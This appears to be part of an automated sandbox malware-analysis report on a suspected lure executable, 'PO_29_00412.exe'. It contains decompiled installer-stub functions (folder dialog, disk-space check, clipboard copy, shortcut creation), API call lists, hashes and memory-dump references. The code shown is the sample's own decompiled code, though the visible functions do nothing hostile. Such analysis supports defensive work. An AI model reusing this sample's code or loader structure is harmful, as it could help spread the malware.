                                                                            0x004056f9
                                                                            0x004056fc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405706
                                                                            0x0040570c
                                                                            0x0040570e
                                                                            0x00405711
                                                                            0x0040580e
                                                                            0x00000000
                                                                            0x0040580e
                                                                            0x00405720
                                                                            0x0040572c
                                                                            0x00405735
                                                                            0x0040573c
                                                                            0x00405740
                                                                            0x00405743
                                                                            0x0040574c
                                                                            0x00405752
                                                                            0x00405755
                                                                            0x00405755
                                                                            0x00405765
                                                                            0x0040576b
                                                                            0x0040576e
                                                                            0x00405779
                                                                            0x00405779
                                                                            0x0040577a
                                                                            0x0040577d
                                                                            0x00405784
                                                                            0x0040578b
                                                                            0x00405793
                                                                            0x00405793
                                                                            0x004057a1
                                                                            0x004057a7
                                                                            0x004057aa
                                                                            0x004057aa
                                                                            0x004057b1
                                                                            0x004057b7
                                                                            0x004057c0
                                                                            0x004057c7
                                                                            0x004057d0
                                                                            0x004057d2
                                                                            0x004057d5
                                                                            0x004057e4
                                                                            0x004057e6
                                                                            0x004057e9
                                                                            0x004057ea
                                                                            0x004057ed
                                                                            0x004057ee
                                                                            0x004057ef
                                                                            0x004057ef
                                                                            0x004057f7
                                                                            0x00405802
                                                                            0x00405808
                                                                            0x00405808
                                                                            0x00000000
                                                                            0x0040576e
                                                                            0x0040569e
                                                                            0x004056a4
                                                                            0x004056d2
                                                                            0x004056d4
                                                                            0x004056da
                                                                            0x004056e5
                                                                            0x004056e5
                                                                            0x004056ec
                                                                            0x00000000
                                                                            0x004056ec
                                                                            0x004056a8
                                                                            0x004056b2
                                                                            0x00000000
                                                                            0x00405676
                                                                            0x00405676
                                                                            0x0040567c
                                                                            0x004056b7
                                                                            0x00000000
                                                                            0x004056be
                                                                            0x00405685
                                                                            0x0040568c
                                                                            0x00405691
                                                                            0x00000000
                                                                            0x00405691
                                                                            0x00405674
                                                                            0x004054af
                                                                            0x004054b3
                                                                            0x004054bb
                                                                            0x004054bf
                                                                            0x004054c2
                                                                            0x004054c5
                                                                            0x004054c8
                                                                            0x004054cb
                                                                            0x004054cc
                                                                            0x004054cd
                                                                            0x004054e6
                                                                            0x004054e9
                                                                            0x004054f3
                                                                            0x00405502
                                                                            0x0040550a
                                                                            0x00405512
                                                                            0x00405517
                                                                            0x0040551a
                                                                            0x00405526
                                                                            0x0040552f
                                                                            0x00405538
                                                                            0x0040555a
                                                                            0x00405560
                                                                            0x00405571
                                                                            0x00405576
                                                                            0x00405584
                                                                            0x00405592
                                                                            0x00405592
                                                                            0x00405597
                                                                            0x004055a5
                                                                            0x004055a5
                                                                            0x004055aa
                                                                            0x004055ad
                                                                            0x004055b2
                                                                            0x004055be
                                                                            0x004055c7
                                                                            0x004055d4
                                                                            0x004055e3
                                                                            0x004055d6
                                                                            0x004055db
                                                                            0x004055db
                                                                            0x004055ef
                                                                            0x004055ef
                                                                            0x00405603
                                                                            0x0040560c
                                                                            0x00405615
                                                                            0x00405625
                                                                            0x00405631
                                                                            0x00405631
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDlgItem.USER32 ref: 004054EC
                                                                            • GetDlgItem.USER32 ref: 004054FB
                                                                            • GetClientRect.USER32 ref: 00405538
                                                                            • GetSystemMetrics.USER32 ref: 0040553F
                                                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405560
                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405571
                                                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405584
                                                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405592
                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055A5
                                                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055C7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004055DB
                                                                            • GetDlgItem.USER32 ref: 004055FC
                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040560C
                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405625
                                                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405631
                                                                            • GetDlgItem.USER32 ref: 0040550A
                                                                              • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                                                            • GetDlgItem.USER32 ref: 0040564D
                                                                            • CreateThread.KERNEL32 ref: 0040565B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405662
                                                                            • ShowWindow.USER32(00000000), ref: 00405685
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040568C
                                                                            • ShowWindow.USER32(00000008), ref: 004056D2
                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405706
                                                                            • CreatePopupMenu.USER32 ref: 00405717
                                                                            • AppendMenuA.USER32 ref: 0040572C
                                                                            • GetWindowRect.USER32 ref: 0040574C
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057A1
                                                                            • OpenClipboard.USER32(00000000), ref: 004057B1
                                                                            • EmptyClipboard.USER32 ref: 004057B7
                                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                                                                            • GlobalLock.KERNEL32 ref: 004057CA
                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057DE
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                                                                            • SetClipboardData.USER32 ref: 00405802
                                                                            • CloseClipboard.USER32 ref: 00405808
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: PB
                                                                            • API String ID: 590372296-3196168531
                                                                            • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                                            • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                                                                            • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                                            • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x71ad46
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                            0x0040473e
                                                                            0x00404744
                                                                            0x0040474a
                                                                            0x00404757
                                                                            0x00404765
                                                                            0x00404768
                                                                            0x00404770
                                                                            0x00404776
                                                                            0x00404776
                                                                            0x00404782
                                                                            0x00404785
                                                                            0x004047f3
                                                                            0x004047fa
                                                                            0x004048d1
                                                                            0x004048d8
                                                                            0x004048e7
                                                                            0x004048e7
                                                                            0x004048eb
                                                                            0x004048f5
                                                                            0x00404902
                                                                            0x00404904
                                                                            0x00404904
                                                                            0x00404912
                                                                            0x00404919
                                                                            0x00404920
                                                                            0x00404923
                                                                            0x0040495a
                                                                            0x0040495c
                                                                            0x00404962
                                                                            0x00404967
                                                                            0x0040496b
                                                                            0x0040496d
                                                                            0x0040496d
                                                                            0x00404989
                                                                            0x00000000
                                                                            0x0040498b
                                                                            0x0040498e
                                                                            0x0040499c
                                                                            0x004049a2
                                                                            0x004049a3
                                                                            0x004049a6
                                                                            0x004049a9
                                                                            0x00000000
                                                                            0x004049a9
                                                                            0x00404925
                                                                            0x00404927
                                                                            0x0040492b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040492d
                                                                            0x0040492d
                                                                            0x0040493a
                                                                            0x0040493f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404943
                                                                            0x00404945
                                                                            0x00404945
                                                                            0x0040494d
                                                                            0x0040494f
                                                                            0x00404952
                                                                            0x00404955
                                                                            0x00404958
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404958
                                                                            0x004049b5
                                                                            0x004049bf
                                                                            0x004049c2
                                                                            0x004049c5
                                                                            0x004049cc
                                                                            0x004049cc
                                                                            0x004049ce
                                                                            0x004049ce
                                                                            0x004049d3
                                                                            0x004049d5
                                                                            0x004049dd
                                                                            0x004049e4
                                                                            0x004049e6
                                                                            0x004049f1
                                                                            0x004049f1
                                                                            0x004049e6
                                                                            0x004049f8
                                                                            0x00404a01
                                                                            0x00404a0b
                                                                            0x00404a13
                                                                            0x00404a2e
                                                                            0x00404a15
                                                                            0x00404a1e
                                                                            0x00404a1e
                                                                            0x00404a13
                                                                            0x00404a33
                                                                            0x00404a38
                                                                            0x00404a3d
                                                                            0x00404a46
                                                                            0x00404a46
                                                                            0x00404a4f
                                                                            0x00404a51
                                                                            0x00404a51
                                                                            0x00404a5d
                                                                            0x00404a65
                                                                            0x00404a6f
                                                                            0x00404a6f
                                                                            0x00404a74
                                                                            0x00000000
                                                                            0x00404a74
                                                                            0x00404923
                                                                            0x004048da
                                                                            0x004048e1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004048e1
                                                                            0x00404800
                                                                            0x00404809
                                                                            0x00404823
                                                                            0x00404828
                                                                            0x00404832
                                                                            0x00404839
                                                                            0x00404845
                                                                            0x00404848
                                                                            0x0040484b
                                                                            0x00404852
                                                                            0x0040485a
                                                                            0x0040485d
                                                                            0x00404861
                                                                            0x00404868
                                                                            0x00404870
                                                                            0x004048ca
                                                                            0x00404872
                                                                            0x00404873
                                                                            0x0040487a
                                                                            0x00404884
                                                                            0x0040488c
                                                                            0x00404899
                                                                            0x004048ad
                                                                            0x004048b1
                                                                            0x004048b1
                                                                            0x004048ad
                                                                            0x004048b6
                                                                            0x004048c3
                                                                            0x004048c3
                                                                            0x00404870
                                                                            0x00000000
                                                                            0x00404828
                                                                            0x00404816
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040481c
                                                                            0x00000000
                                                                            0x00404787
                                                                            0x00404794
                                                                            0x0040479d
                                                                            0x004047aa
                                                                            0x004047aa
                                                                            0x004047b1
                                                                            0x004047b7
                                                                            0x004047c0
                                                                            0x004047c3
                                                                            0x004047c6
                                                                            0x004047ce
                                                                            0x004047d1
                                                                            0x004047d4
                                                                            0x004047da
                                                                            0x004047e1
                                                                            0x004047e8
                                                                            0x00404a7a
                                                                            0x00404a8c
                                                                            0x004047ee
                                                                            0x004047f1
                                                                            0x00000000
                                                                            0x004047f1
                                                                            0x004047e8

                                                                            APIs
                                                                            • GetDlgItem.USER32 ref: 0040478D
                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                                                                            • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404873
                                                                            • lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
                                                                            • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
                                                                            • SetDlgItemTextA.USER32 ref: 004048C3
                                                                              • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                                                              • Part of subcall function 00406503: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO_29_00412.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                                                              • Part of subcall function 00406503: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                                                              • Part of subcall function 00406503: CharNextA.USER32(?,"C:\Users\user\Desktop\PO_29_00412.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                                                              • Part of subcall function 00406503: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                                                            • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040499C
                                                                              • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                                              • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                                                              • Part of subcall function 00404AF5: SetDlgItemTextA.USER32 ref: 00404BAE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
                                                                            • API String ID: 2624150263-1248408130
                                                                            • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                                            • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                                                                            • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                                            • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 74%
                                                                            			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                            0x00402174
                                                                            0x0040217e
                                                                            0x00402188
                                                                            0x00402195
                                                                            0x004021a0
                                                                            0x004021a3
                                                                            0x004021bd
                                                                            0x004021c3
                                                                            0x004021c9
                                                                            0x004021cc
                                                                            0x004021d6
                                                                            0x004021da
                                                                            0x004021da
                                                                            0x004021df
                                                                            0x004021f0
                                                                            0x004021f8
                                                                            0x004022d4
                                                                            0x004022d4
                                                                            0x004022db
                                                                            0x004021fe
                                                                            0x004021fe
                                                                            0x0040220d
                                                                            0x00402211
                                                                            0x00402214
                                                                            0x0040221a
                                                                            0x00402228
                                                                            0x0040222b
                                                                            0x0040222d
                                                                            0x00402238
                                                                            0x00402238
                                                                            0x0040223d
                                                                            0x0040223f
                                                                            0x00402246
                                                                            0x00402246
                                                                            0x00402249
                                                                            0x00402252
                                                                            0x00402255
                                                                            0x0040225a
                                                                            0x0040225c
                                                                            0x00402269
                                                                            0x00402269
                                                                            0x0040226c
                                                                            0x00402278
                                                                            0x0040227b
                                                                            0x00402284
                                                                            0x0040228a
                                                                            0x00402291
                                                                            0x004022aa
                                                                            0x004022ac
                                                                            0x004022ba
                                                                            0x004022ba
                                                                            0x004022aa
                                                                            0x004022bd
                                                                            0x004022c3
                                                                            0x004022c3
                                                                            0x004022c6
                                                                            0x004022cc
                                                                            0x004022d2
                                                                            0x004022e7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004022d2
                                                                            0x004022dd
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                            • API String ID: 123533781-501415292
                                                                            • Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                                                            • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                                                                            • Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                                                            • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 39%
                                                                            			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                            0x004027b9
                                                                            0x004027cd
                                                                            0x004027d8
                                                                            0x004027d9
                                                                            0x00402918
                                                                            0x004027bb
                                                                            0x004027bb
                                                                            0x004027bd
                                                                            0x004027bf
                                                                            0x004027bf
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
